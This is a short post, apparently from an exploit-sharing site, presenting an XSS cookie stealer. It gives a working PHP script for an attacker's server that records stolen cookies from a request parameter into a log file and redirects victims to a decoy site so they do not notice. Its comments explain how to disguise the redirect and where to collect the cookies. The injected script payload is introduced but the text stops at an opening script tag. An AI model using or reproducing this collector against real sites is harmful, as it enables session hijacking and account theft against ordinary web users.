Title: How Write an XSS Cookie Stealer in JavaScript to Steal PasswordsAuthor: unknowndevice64
// Upload/Save this file on ATTACKER_SERVER cookiestealer.php //
// change this google.com to same website, which you are attacking, so that Victim can't detect. //
// you can find cookie into same directory where you put this file, name log.txt //

header ('Location:https://google.com');

$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "\n\n");

// Payload to inject into XSS //
// replace ATTACKER_SERVER by real URL or IP //

<script type="text/javascript">

Submitted On: 2019-11-08 22:57:46